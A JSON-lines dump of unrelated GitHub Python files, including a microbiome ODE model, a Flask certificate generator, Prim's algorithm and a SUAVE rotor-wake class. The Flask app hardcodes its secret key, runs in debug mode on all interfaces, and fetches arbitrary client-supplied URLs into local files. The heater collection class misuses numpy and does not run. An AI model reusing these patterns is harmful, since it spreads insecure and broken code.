r'^task/(?P\\d+)$', 'task' ),\n url( r'^show_lst_not_dev$', \t\t\t 'show_lst_not_dev' ),\n url( r'^change_status$', 'change_status' ),\n url( r'^get_tasks$', 'get_tasks' ),\n url( r'^assign_for_user', 'assign_for_user' ),\n url( r'^get_progress_bar_user$', 'get_progress_bar_user' ),\n url( r'^statistic_users$', 'statistic_users' ),\n url( r'^get_progress_users$', 'get_progress_users' ),\n)","repo_name":"RitaTim/task-manager","sub_path":"task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72707290433","text":"# -*- coding: utf-8 -*-\n# Extention to handeling time series data\n\nimport torch\nfrom torch import nn\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom mbpert.odesolver import RK45\n\n\n# End point of integration, assume integration starts at t = 0. Used to rescale\n# the actual observation time point in days. A larger value should be used if\n# the observed time series are steady state abundances\n# INTEGRATE_END = 30\nINTEGRATE_END = 10 # for MTIST\n\ndef glvp2(t, x, r, A, eps, P, T):\n \"\"\"Define generalized lotka-volterra dynamic system with time-dependent\n perturbations\n\n x --- (n_species,) Species (dimensionless) absolute abundances\n r --- (n_species,) Growth rate\n A --- (n_species, n_species) Species interaction matrix\n eps --- (n_species, perts) eps_{ij}: Species i's susceptibility to perturbation j\n P --- (T+1, perts) Time-dependent perturbation matrix: P_{dp} = 1 if pert p is applied at day d\n T --- duration of the observation in days, used to scale t\n \"\"\"\n assert t <= INTEGRATE_END\n\n out = x * (r + A @ x + eps @ P[int(T * t / INTEGRATE_END)])\n return out\n\n\n# Custom PyTorch module\n\nclass MBPertTS(nn.Module):\n def __init__(self, n_species, P):\n super().__init__()\n self.r = nn.Parameter(torch.rand((n_species, )))\n\n if torch.any(P):\n self.eps = nn.Parameter(torch.randn(n_species, P.shape[1]))\n else: # no perturbations, so eps not a Parameter any more\n self.eps = torch.zeros(n_species, P.shape[1])\n\n # Proper initialization of interaction matrix for stability\n self.A = 1 / (2 * n_species**(0.5)) * torch.randn(n_species, n_species)\n self.A = nn.Parameter(self.A.fill_diagonal_(-1))\n # mask = ~torch.eye(n_species, dtype=torch.bool)\n # self.A = -torch.eye(n_species) # making diag elements -1\n # self.A[mask] = 1 / (2 * n_species**(0.5)) * torch.randn(n_species**2 - n_species, requires_grad=True)\n # self.A = nn.Parameter(self.A)\n\n self.P = P.to('cuda') if torch.cuda.is_available() else P # time-dependent perturbation matrix\n self.T = P.shape[0] - 1 # max days of the experiment\n\n def forward(self, x, t):\n self.solver = RK45(glvp2, [0,t], args=(self.r, self.A, self.eps, self.P, self.T))\n return self.solver.solve(x)\n\n# Custom Dataset\n\n# Custome Dataset to handle each data unit. Here each data unit corresponds to\n# one time slice: initial state at t = 0 and output state at t = t\nclass MBPertTSDataset(Dataset):\n def __init__(self, X, P, meta, transform=None, target_transform=None):\n \"\"\"X --- (n_species, n_t) Microbiome time series data X_{i} giving species i's abundance trajectory.\n The first column is the initial state. For multiple groups, X is a columnwise\n concatenation of species trajectories of all groups.\n P --- (T+1, perts) Time-dependent perturbation matrix: P_{dp} = 1 if pert p is applied at day d\n where d = 0, 1, ..., T\n meta --- (n_t, 2) Metadata with two columns, group id and measurement time.\n The first column is group id in natural order (if all data are from one individual \n then this will be a column of 1s), the second column contains actual time units (days)\n at which the data was observed, corresponding to columns of X. Typically,\n but not always, the initial observation is at day 0.\n \"\"\"\n self.X = np.loadtxt(X, dtype=np.float32) if isinstance(X, str) else X.astype(np.float32)\n self.P = np.loadtxt(P, dtype=bool) if isinstance(P, str) else P.astype(bool)\n\n # If there is only one column/perturbation, np.loadtxt ignores the column dimension,\n # so here make P a column vector\n if self.P.ndim == 1:\n self.P = self.P.reshape(-1, 1)\n self.P = torch.from_numpy(self.P).float()\n\n self.meta = np.loadtxt(meta, dtype=np.float32) if isinstance(meta, str) else meta.astype(np.float32)\n self.tobs = self.meta[:, 1]\n self.n_species = self.X.shape[0]\n self.T = self.P.shape[0] - 1\n self.gids = self.meta[:, 0]\n self.n_groups = int(max(self.gids))\n\n self.transform = transform\n self.target_transform = target_transform\n\n if len(self.tobs) != self.X.shape[1] or len(self.tobs) < 2:\n raise ValueError(\"Incorrect input data size.\")\n\n def __len__(self):\n return len(self.tobs) - 1\n\n def __getitem__(self, idx):\n gid = self.gids[idx] # which group does 'idx' correspond to\n\n # If next idx corresponds to a different group, then we are at the end time point, \n # no data is available for the current group, return the first data unit of next group.\n # Note that this will produce a duplicate data unit for the first data unit of each group\n # from the second to the last group. But this allows us to continue using len(self.tobs) - 1\n # instead of len(self.tobs) - self.n_groups in defining the number of instances in the Dataset, \n # which works for single group case. \n if self.gids[idx + 1] != gid: \n start = idx + 1\n x0 = torch.from_numpy(self.X[:, start])\n t = self.tobs[start + 1] * INTEGRATE_END / self.T\n xt = torch.from_numpy(self.X[:, start + 1])\n else:\n start = np.argmax(self.gids == gid)\n x0 = torch.from_numpy(self.X[:, start])\n t = self.tobs[idx + 1] * INTEGRATE_END / self.T\n xt = torch.from_numpy(self.X[:, idx + 1])\n\n if self.transform:\n x0 = self.transform(x0)\n if self.target_transform:\n xt = self.target_transform(xt)\n\n return (x0, t), xt\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yuanwxu/mbpert","sub_path":"mbpert/mbpertTS.py","file_name":"mbpertTS.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25219488589","text":"from flask import Flask, render_template, redirect, request, flash, url_for, jsonify, abort, send_from_directory, make_response, send_file\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime, os\nimport json\nimport csv\nimport io\nfrom google.cloud import storage\nfrom zipfile import ZipFile\nimport requests\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nAPP_URL = os.environ.get(\"APP_URL\", \"test\")\nBULK_CERTIFY_URL = os.environ.get(\"BULK_CERTIFY_URL\", \"test\")\nCLOUD_STORAGE_BUCKET=os.environ.get(\"CLOUD_STORAGE_BUCKET\", \"test\")\n\napp = Flask(__name__)\n\napp.secret_key = \"GDSCSJEC\"\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///certs.db\"\n\ndb = SQLAlchemy(app)\n\n\nclass Fonts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n font_cdn = db.Column(db.String(500), nullable=True)\n\nclass Certificate(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n number = db.Column(db.String(50), nullable=False)\n name = db.Column(db.String(50), nullable=False)\n email = db.Column(db.String(50), nullable=False)\n # is_email_sent = db.Column(db.Boolean, default=False)\n coursename = db.Column(db.String(500), nullable=False)\n # last_update = db.Column(db.String(50), nullable=False, default=x)\n group_id = db.Column(db.Integer, db.ForeignKey('group.id'))\n # user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n qrcode = db.relationship('QRCode', cascade=\"all,delete\", backref='qrcode')\n\nclass Group(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), nullable=False)\n date = db.Column(db.String(50), nullable=False)\n textColor = db.Column(db.String(50), nullable=True)\n bg_image = db.Column(db.String(500), nullable=True)\n font_size = db.Column(db.Integer, nullable=False)\n font_name = db.Column(db.String(250), nullable=False)\n certx = db.Column(db.Integer, nullable=False)\n certy = db.Column(db.Integer, nullable=False)\n qrx = db.Column(db.Integer, nullable=False)\n qry = db.Column(db.Integer, nullable=False)\n certnox = db.Column(db.Integer, nullable=False)\n certnoy = db.Column(db.Integer, nullable=False)\n prefix = db.Column(db.String(20), default='CGV')\n zip_url = db.Column(db.String(500), default=None)\n # user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n certificates = db.relationship(\n 'Certificate', cascade=\"all,delete\", backref='certificates')\n\n\n\nclass QRCode(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n certificate_num = db.Column(db.String(50), nullable=False)\n link = db.Column(db.String(200), nullable=False)\n qr_code = db.Column(db.String(100), nullable=True)\n certificate_id = db.Column(db.Integer, db.ForeignKey('certificate.id'))\n\n\n@app.route(\"/\")\ndef dashboard_page():\n postc = len(Certificate.query.order_by(Certificate.id).all())\n return render_template('dashboard.html', favTitle=\"Hello world\", postc=postc)\n\n@app.route('/get-all-fonts', methods=['GET'])\ndef get_all_fonts():\n fonts = Fonts.query.order_by(Fonts.id).all()\n data = {'font': [fonts.name for fonts in fonts]}\n return jsonify(data)\n\n@app.route(\"/edit/group/\", methods=['GET', 'POST'])\ndef edit_org_page(id):\n if request.method == 'POST':\n name = request.form.get(\"name\")\n certx = request.form.get(\"certx\")\n certy = request.form.get(\"certy\")\n qrx = request.form.get(\"qrx\")\n qry = request.form.get(\"qry\")\n certnox = request.form.get(\"certnox\")\n certnoy = request.form.get(\"certnoy\")\n font_size = request.form.get(\"font_size\")\n font_name = request.form.get(\"font_name\")\n textColor = request.form.get(\"textColor\")\n bg_image = request.files.get(\"bg_image\")\n prefix = request.form.get(\"prefix\")\n date = datetime.datetime.now()\n if id == '0':\n try:\n post = Group(name=name, textColor=textColor, font_size=font_size, font_name=font_name, certx=certx, certy=certy, qrx=qrx, qry=qry,\n certnox=certnox, certnoy=certnoy, prefix=prefix, date=date)\n img_name = name.replace(\" \", \"+\")\n if not app.debug:\n # upload_image(bg_image, folder=\"backgrounds\", name=name)\n # bg_url = f\"https://cgv.s3.us-east-2.amazonaws.com/backgrounds/{img_name}.png\"\n # bg_url = upload(bg_image)\n pass\n else:\n try:\n os.mkdir(\"static/backgrounds\")\n except Exception:\n pass\n bg_image.save(f\"static/backgrounds/{img_name}.png\")\n bg_url = f\"{APP_URL}/static/backgrounds/{img_name}.png\"\n post.bg_image = bg_url\n db.session.add(post)\n db.session.commit()\n db.session.commit()\n return jsonify(result=True, status=200)\n except Exception:\n return jsonify(group_error=True)\n else:\n try:\n post = Group.query.filter_by(id=id).first()\n post.name = name\n img_name = name.replace(\" \", \"+\")\n if bg_image:\n if not app.debug:\n # upload_image(bg_image, folder=\"backgrounds\", name=name)\n # bg_url = f\"https://cgv.s3.us-east-2.amazonaws.com/backgrounds/{img_name}.png\"\n # bg_url = upload(bg_image)\n pass\n else:\n bg_image.save(f\"static/backgrounds/{name}\")\n bg_url = f\"{APP_URL}/static/backgrounds/{name}\"\n post.bg_image = bg_url\n post.date = date\n post.certx = certx\n post.certy = certy\n post.qrx = qrx\n post.qry = qry\n post.font_name = font_name\n post.font_size = font_size\n post.certnox = certnox\n post.certnoy = certnoy\n post.textColor = textColor\n # post.user_id = current_user.id\n db.session.commit()\n return jsonify(result=True, status=200)\n except Exception:\n return jsonify(result=False, status=500)\n grp = Group.query.filter_by(id=id).first()\n post = {\n \"id\": grp.id,\n \"name\": grp.name,\n \"certx\": grp.certx,\n \"certy\": grp.certy,\n \"qrx\": grp.qrx,\n \"qry\": grp.qry,\n \"certnox\": grp.certnox,\n \"certnoy\": grp.certnoy,\n \"font_size\": grp.font_size,\n \"font_name\": grp.font_name,\n \"textColor\": grp.textColor,\n }\n return jsonify(favTitle='Certify', id=id, post=post)\n\n@app.route(\"/view/groups\", methods=['GET', 'POST'])\ndef view_org_page():\n post = Group.query.order_by(Group.id).all()\n return render_template('org_table.html', post=post)\n\n\n@app.route(\"/view//certificates\", methods=['GET', 'POST'])\ndef view_certificate_page(grp_id):\n post = Certificate.query.filter_by(group_id=grp_id).order_by(Certificate.id)\n group = Group.query.filter_by(id=grp_id).first()\n return render_template('certificate_table.html', post=post, grp_id=grp_id, BULK_CERTIFY_URL=BULK_CERTIFY_URL, zip_url=group.zip_url)\n\n\n@app.route(\"/edit//certificates/\", methods=['GET', 'POST'])\ndef edit_certificates_page(grp_id, id):\n if request.method == 'POST':\n data = json.loads(request.data)\n name = data[\"name\"]\n coursename = data[\"course\"]\n email = data[\"email\"]\n group = Group.query.filter_by(id=grp_id).first()\n try:\n last_certificate = Certificate.query.filter_by(\n group_id=grp_id).order_by(-Certificate.id).first()\n last_certificate_num = int(\n last_certificate.number[len(last_certificate.number)-4:])\n cert_number = str(last_certificate_num + 1).zfill(4)\n except Exception as e:\n cert_number = '1'.zfill(4)\n number = group.prefix + cert_number\n # userid = current_user.id\n # last_update = x\n if id == '0':\n postcheck = Certificate.query.filter_by(\n email=email, group_id=grp_id).first()\n if (postcheck == None):\n try:\n post = Certificate(name=name, number=number, email=email, coursename=coursename, group_id=grp_id)\n db.session.add(post)\n db.session.commit()\n return jsonify(certificate_success=True)\n except Exception as e:\n print(e)\n return jsonify(certificate_error=True)\n else:\n return jsonify(certificate_duplicate=True)\n else:\n try:\n post = Certificate.query.filter_by(id=id).first()\n post.name = name\n post.coursename = coursename\n post.email = email\n # post.user_id = current_user.id\n post.group_id = grp_id\n # post.last_update = time\n db.session.commit()\n return jsonify(certificate_success=True)\n except Exception as e:\n print(e)\n return jsonify(certificate_error=True)\n cert = Certificate.query.filter_by(id=id).first()\n post = {\n \"id\": cert.id,\n \"name\": cert.name,\n \"coursename\": cert.coursename,\n \"email\": cert.email,\n \"number\": cert.number\n }\n return jsonify(id=id, post=post)\n\n@app.route(\"/delete//certificates/\", methods=['GET', 'POST'])\ndef delete_certificates_page(grp_id, id):\n delete_certificates_page = Certificate.query.filter_by(id=id).first()\n db.session.delete(delete_certificates_page)\n db.session.commit()\n flash(\"Certificate deleted successfully!\", \"success\")\n return redirect(f'/view/{grp_id}/certificates')\n\n@app.route(\"/certificate/generate/\", methods=['GET', 'POST'])\ndef certificate_generate(certificateno, bulkDownload = 0):\n if (request.method == 'GET'):\n bulkDownload = request.values.get('bulk', 0)\n postc = Certificate.query.filter_by(number=certificateno).first()\n if (postc != None):\n posto = Group.query.filter_by(id=postc.group_id).first()\n postf = Fonts.query.filter_by(name=posto.font_name).first()\n return render_template('certificate.html', postf=postf, postc=postc, posto=posto, number=certificateno, bulk = bulkDownload)\n elif (postc == None):\n flash(\"No details found. Contact your organization!\", \"danger\")\n return render_template('Redesign-generate.html')\n\n@app.route('/upload//certificate', methods=['POST', 'GET'])\ndef upload_csv(grp_id):\n group = Group.query.filter_by(id=grp_id).first()\n csv_file = request.files['fileToUpload']\n csv_file = io.TextIOWrapper(csv_file, encoding='utf-8')\n csv_reader = csv.reader(csv_file, delimiter=',')\n # This skips the first row of the CSV file.\n next(csv_reader)\n for row in csv_reader:\n try:\n last_certificate = Certificate.query.filter_by(\n group_id=grp_id).order_by(-Certificate.id).first()\n last_certificate_num = int(\n last_certificate.number[len(last_certificate.number)-4:])\n cert_number = str(last_certificate_num + 1).zfill(4)\n except Exception as e:\n cert_number = '1'.zfill(4)\n number = group.prefix + cert_number\n certificate = Certificate(\n number=number, name=row[0], email=row[1], coursename=row[2], group_id=grp_id)\n db.session.add(certificate)\n db.session.commit()\n return jsonify(result=True, status=200)\n\n@app.route(\"/certificate/mass-generate/\")\ndef massGenerate(groupno):\n certificate_list = Certificate.query.filter_by(group_id = groupno).limit(3).all()\n response = {}\n\n response[\"group_no\"] = groupno\n response[\"certificates\"] = []\n\n for certificate in certificate_list:\n response[\"certificates\"].append({\n \"certificate_no\": certificate.number,\n \"certficate_link\": APP_URL + \"/certificate/generate/\" + certificate.number\n })\n\n return jsonify(response)\n\n@app.route(\"/download-zip/\", methods=['POST'])\ndef downloadzip(groupno):\n request_data = request.get_json()\n certificate_public_urls = request_data[\"certificate_public_urls\"]\n\n print(certificate_public_urls)\n\n zipper = ZipFile(f\"certificates_{groupno}.zip\", 'w')\n\n for certificate in certificate_public_urls:\n r = requests.get(certificate, allow_redirects=True)\n filename = certificate.split(\"%2F\")[-1]\n with open(filename, 'wb') as f:\n f.write(r.content)\n zipper.write(filename)\n\n zipper.close()\n\n return send_file(f\"certificates_{groupno}.zip\", mimetype=\"application/zip\", as_attachment=True, attachment_filename=f\"certificates_{groupno}.zip\")\n\n@app.route(\"/update-zip-url/\", methods=[\"PUT\"])\ndef update_zip_url(group_no):\n group = Group.query.filter_by(id=group_no).first()\n zip_url = request.args.get(\"zip_url\")\n group.zip_url = zip_url\n db.session.commit()\n return \"\", 201\n\ndef add_default_fonts():\n total = len(Fonts.query.all())\n if total == 0:\n TimesNewRoman = Fonts(name=\"Times New Roman\", font_cdn=\"https://fonts.cdnfonts.com/css/times-new-roman\")\n OpenSans = Fonts(name=\"Open Sans\", font_cdn=\"https://fonts.cdnfonts.com/css/open-sans\")\n db.session.add(TimesNewRoman)\n db.session.add(OpenSans)\n db.session.commit()\n\nif __name__ == '__main__':\n db.create_all()\n add_default_fonts()\n app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))","repo_name":"GDSC-SJEC/gccp-gdscsjec-certifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"489210305","text":"inf=10**9\nfrom collections import defaultdict\ndef findMin(value,setMST):\n min=inf\n vertex=0\n for i in range(len(value)):\n if setMST[i]==False and value[i]adjMatrix[u][j] and setMST[j]==False:\n value[j]=adjMatrix[u][j]\n parent[j]=u\n path=defaultdict(list)\n for i in range(v):\n for j in range(v):\n if parent[j]==i:\n path[i].append(j)\n for source in path:\n dest=path[source]\n for x in dest:\n print(source,\"-->\",x,value[x])\n\nadjMatrix=[ [0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\nPrismAlgorithm(adjMatrix,len(adjMatrix))\n#TC (V^2)\n","repo_name":"RohanKumarRoy/Algorithm","sub_path":"prism_algorithm.py","file_name":"prism_algorithm.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38836179813","text":"## @ingroup Analyses-Propulsion\n# Rotor_Wake_Fidelity_One.py\n#\n# Created: Jan 2022, R. Erhard\n# Modified: \n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\nfrom SUAVE.Core import Data\nfrom SUAVE.Components import Wings\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom SUAVE.Analyses.Propulsion.Rotor_Wake_Fidelity_Zero import Rotor_Wake_Fidelity_Zero\nfrom SUAVE.Methods.Propulsion.Rotor_Wake.Fidelity_One.fidelity_one_wake_convergence import fidelity_one_wake_convergence\nfrom SUAVE.Methods.Propulsion.Rotor_Wake.Fidelity_One.compute_wake_induced_velocity import compute_wake_induced_velocity \nfrom SUAVE.Methods.Aerodynamics.Common.Fidelity_Zero.Lift.extract_wing_VD import extract_wing_collocation_points\n\n# package imports\nimport copy\nimport numpy as np\n# ----------------------------------------------------------------------\n# Generalized Rotor Class\n# ----------------------------------------------------------------------\n## @ingroup Analyses-Propulsion\nclass Rotor_Wake_Fidelity_One(Energy_Component):\n \"\"\" SUAVE.Analyses.Propulsion.Rotor_Wake_Fidelity_One()\n \n The Fidelity One Rotor Wake Class\n Uses a semi-prescribed vortex wake (PVW) model of the rotor wake\n\n Assumptions:\n None\n\n Source:\n None\n \"\"\"\n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\"\n\n self.tag = 'rotor_wake'\n self.wake_method = 'Fidelity_One'\n self.vortex_distribution = Data()\n self.wake_method_fidelity = 0\n self.semi_prescribed_converge = False # flag for convergence on semi-prescribed wake shape\n self.vtk_save_flag = False # flag for saving vtk outputs of wake\n self.vtk_save_loc = None # location to save vtk outputs of wake\n \n self.wake_settings = Data()\n self.wake_settings.number_rotor_rotations = 5\n self.wake_settings.number_steps_per_rotation = 72\n self.wake_settings.initial_timestep_offset = 0 # initial timestep\n \n # wake convergence criteria\n self.maximum_convergence_iteration = 10\n self.axial_velocity_convergence_tolerance = 1e-2\n \n # flags for slipstream interaction\n self.slipstream = False\n self.verbose = False\n \n def initialize(self,rotor,conditions):\n \"\"\"\n Initializes the rotor by evaluating the BET once. This is required for generating the \n circulation strengths for the vortex distribution in the prescribed vortex wake, and the \n initial wake shape, which relies on the axial inflow induced by the wake at the rotor disc.\n \n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n self - rotor wake\n rotor - SUAVE rotor\n conditions - conditions\n \n \n Outputs:\n None\n \n Properties Used:\n None\n \n \"\"\"\n # run the BET once using fidelity zero inflow\n rotor_temp = copy.deepcopy(rotor)\n rotor_temp.Wake = Rotor_Wake_Fidelity_Zero()\n _,_,_,_,outputs,_ = rotor_temp.spin(conditions)\n \n rotor.outputs = outputs\n \n # match the azimuthal discretization betwen rotor and wake\n if self.wake_settings.number_steps_per_rotation != rotor.number_azimuthal_stations:\n self.wake_settings.number_steps_per_rotation = rotor.number_azimuthal_stations\n \n if self.verbose:\n print(\"Wake azimuthal discretization does not match rotor discretization. \\\n Resetting wake to match rotor of Na=\"+str(rotor.number_azimuthal_stations))\n \n return\n \n def evaluate(self,rotor,wake_inputs,conditions):\n \"\"\"\n Wake evaluation is performed using a semi-prescribed vortex wake (PVW) method for Fidelity One.\n \n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n self - rotor wake\n rotor - SUAVE rotor\n wake_inputs.\n Ua - Axial velocity\n Ut - Tangential velocity\n r - radius distribution\n conditions - conditions\n \n \n Outputs:\n va - axially-induced velocity from rotor wake\n vt - tangentially-induced velocity from rotor wake\n \n Properties Used:\n None\n \"\"\" \n \n # Initialize rotor with single pass of VW \n self.initialize(rotor,conditions)\n \n # Converge on the Fidelity-One rotor wake shape\n WD, va, vt = fidelity_one_wake_convergence(self,rotor,wake_inputs)\n \n # Store wake shape\n self.vortex_distribution = WD\n \n return va, vt\n \n def evaluate_slipstream(self,rotor,geometry,ctrl_pts,wing_instance=None):\n \"\"\"\n Evaluates the velocities induced by the rotor on a specified wing of the vehicle.\n If no wing instance is specified, uses main wing or last available wing in geometry.\n \n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n self - rotor wake\n rotor - rotor\n geometry - vehicle geometry\n \n Outputs:\n wake_V_ind - induced velocity from rotor wake at (VD.XC, VD.YC, VD.ZC)\n \n Properties Used:\n None\n \"\"\"\n # Check for wing if wing instance is unspecified\n if wing_instance == None:\n nmw = 0\n # check for main wing\n for i,wing in enumerate(geometry.wings):\n if not isinstance(wing,Wings.Main_Wing): continue\n nmw +=1 \n wing_instance = wing\n wing_instance_idx = i\n if nmw == 1:\n pass\n elif nmw>1:\n print(\"No wing specified for slipstream analysis. Multiple main wings in vehicle, using the last one.\")\n else:\n print(\"No wing specified for slipstream analysis. No main wing defined, using the last wing in vehicle.\")\n wing_instance = wing \n wing_instance_idx = i\n \n # Isolate the VD components corresponding to this wing instance\n wing_CPs, slipstream_vd_ids = extract_wing_collocation_points(geometry, wing_instance_idx)\n \n # Evaluate rotor slipstream effect on specified wing instance\n rot_V_wake_ind = self.evaluate_wake_velocities(rotor, wing_CPs, ctrl_pts)\n \n # Expand\n wake_V_ind = np.zeros((ctrl_pts,geometry.vortex_distribution.n_cp,3))\n wake_V_ind[:,slipstream_vd_ids,:] = rot_V_wake_ind\n \n \n return wake_V_ind \n \n def evaluate_wake_velocities(self,rotor,VD,num_ctrl_pts):\n \"\"\"\n Links the rotor wake to compute the wake-induced velocities at the vortex distribution\n control points.\n \n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n self - rotor wake\n rotor - rotor\n VD - vortex distribution\n num_ctrl_pts - number of analysis control points\n \n Outputs:\n prop_V_wake_ind - induced velocity from rotor wake at (VD.XC, VD.YC, VD.ZC)\n \n Properties Used:\n None\n \"\"\" \n #extract wake shape previously generated\n wake_vortex_distribution = rotor.Wake.vortex_distribution\n \n # compute the induced velocity from the rotor wake on the lifting surfaces\n VD.Wake = wake_vortex_distribution\n rot_V_wake_ind = compute_wake_induced_velocity(wake_vortex_distribution,VD,num_ctrl_pts) \n \n return rot_V_wake_ind\n \n def shift_wake_VD(self,wVD, offset):\n \"\"\"\n This shifts the wake by the (x,y,z) coordinates of the offset. \n This is useful for rotors with identical wakes that can be reused and shifted without regeneration.\n \n Assumptions\n None\n \n Source:\n N/A\n \n Inputs:\n wVD - wake vortex distribution\n offset - (x,y,z) offset distances\n \n Outputs\n None\n \n Properties Used\n None\n \n \"\"\"\n for mat in wVD.keys():\n if 'X' in mat:\n wVD[mat] += offset[0]\n elif 'Y' in mat:\n wVD[mat] += offset[1]\n elif 'Z' in mat:\n wVD[mat] += offset[2]\n for mat in wVD.reshaped_wake.keys():\n if 'X' in mat:\n wVD.reshaped_wake[mat] += offset[0]\n elif 'Y' in mat:\n wVD.reshaped_wake[mat] += offset[1]\n elif 'Z' in mat:\n wVD.reshaped_wake[mat] += offset[2] \n \n # update wake distribution\n self.vortex_distribution = wVD\n return\n \n \n\n\n\n\n\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Analyses/Propulsion/Rotor_Wake_Fidelity_One.py","file_name":"Rotor_Wake_Fidelity_One.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"74769973633","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\n# real setup\nn_grid = 300\nserial_number = 1955\n\nfuel_grid = np.zeros(n_grid*n_grid).reshape(n_grid, n_grid)\n\n\ndef calc(x, y, serial_number):\n rack_id = x+10\n power = rack_id*y+serial_number\n return int(str(power*rack_id)[-3])-5\n\n# tests\n# print(calc(122, 79, 57)) # -5\n# print(calc(217, 196, 39)) # 0\n# print(calc(101, 153, 71)) # 4\n\n\n# populate\nfor i in range(n_grid):\n for j in range(n_grid):\n fuel_grid[i][j] = calc(i+1, j+1, serial_number)\ni = 0\nj = 0\nprint(fuel_grid[i:i+3, j:j+3].sum())\n\nstamp_max = 0\nbest_vals = [0, 0, 0]\n# sum sub windows\nfor k in range(1, n_grid):\n grid_window_sum = np.zeros(n_grid*n_grid).reshape(n_grid, n_grid)\n for i in range(n_grid-k+1):\n for j in range(n_grid-k+1):\n grid_window_sum[i][j] = fuel_grid[i:i+k, j:j+k].sum()\n y = np.argmax(grid_window_sum) % n_grid\n x = int((np.argmax(grid_window_sum)-y)/n_grid)\n\n # correcting for indexing from zero\n x += 1\n y += 1\n\n if np.max(grid_window_sum) > stamp_max:\n stamp_max = np.max(grid_window_sum)\n best_vals = [x, y, k]\n\nprint(best_vals)\n","repo_name":"biernackip/advent_of_code","sub_path":"2018/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15048816478","text":"from asyncore import read\nfrom ClaseCalefactorElectrico import Electrico\nfrom ClaseCalefactorGas import Gas\nimport numpy as np\nimport csv\n\nclass Coleccion:\n __calefactores = np.empty()\n\n def __init__(self):\n self.__calefactores = np.empty()\n \n def agregacalefactores(self):\n arre = int(input('Ingrese cantidad de calefactores a cargar: '))\n self.__calefactores = np.empty(arre)\n\n band = True\n arElectrico = open('calefactor-electrico.csv')\n reader = csv.reader(arElectrico,delimiter=';')\n fila = next(reader)\n while band:\n cal = Electrico(fila[0], fila[1], fila[2])\n self.__calefactores = np.append(cal)\n try:\n fila = next(reader)\n except StopIteration:\n band = False\n arElectrico.close\n \n band = True\n arGas = open('calefactor-a-gas.csv')\n reader = csv.reader(arGas,delimiter=';')\n fila1 = next(reader)\n while band:\n ga = Gas(fila[0], fila[1], fila[2], fila[3])\n self.__calefactores = np.append(ga)\n try:\n fila1 = next(reader)\n except StopIteration:\n band = False\n arGas.close\n \n def consultarconsumogas(self):\n min = 999999\n costo = int(input('Ingrese costo por m3: '))\n cant = int(input('Ingrese cantidad estimada a consumir por m3: '))\n print('Calefactores a gas con menor costo de consumo')\n for i in np.nditer(self.__calefactores):\n if type(self.__calefactores[i]) == Gas:\n tot = (self.__calefactores[i].getcalorias() / 10000) * (cant * costo)\n if tot < min:\n min = tot\n print(self.__calefactores[i])\n \n def consultarconsumoelectrico(self):\n min = 999999\n costo = int(input('Ingrese costo por KWs: '))\n cant = int(input('Ingrese cantidad estimada a consumir por KWs: '))\n print('Calefactores electricos con menor costo de consumo')\n for i in np.nditer(self.__calefactores):\n if type(self.__calefactores[i]) == Electrico:\n tot = (self.__calefactores[i].getportencia() / 10000) * (cant * costo)\n if tot < min:\n min = tot\n print(self.__calefactores[i])\n \n def listarminimos(self):\n minGas = 999999\n minElectrico = 999999\n print('Calefactores de menor consumo')\n for i in np.nditer(self.__calefactores):\n if type(self.__calefactores[i]) == Gas:\n totG = (self.__calefactores[i].getcalorias() / 10000)\n if totG == minGas:\n minGas = totG\n print(self.__calefactores[i])\n elif type(self.__calefactores[i]) == Electrico:\n totE = (self.__calefactores[i].getportencia() / 10000)\n if totE < minElectrico:\n minElectrico = totE\n print(self.__calefactores[i])\n","repo_name":"Arty4267/2022","sub_path":"Ejercicio 4 Unidad 3/ClaseColeccion.py","file_name":"ClaseColeccion.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73219625795","text":"#importing libaries\r\nfrom appJar import gui\r\n\r\n#defining varibales\r\nplayerStats = [100]\r\nenemies = [[\"Oil spill\", 50], [\"Plastic bag\", 70], [\"litter\", 80]]\r\nposx = 1\r\nposy = 1\r\n\r\n#Class\r\nclass Game:\r\n def __init__(self, 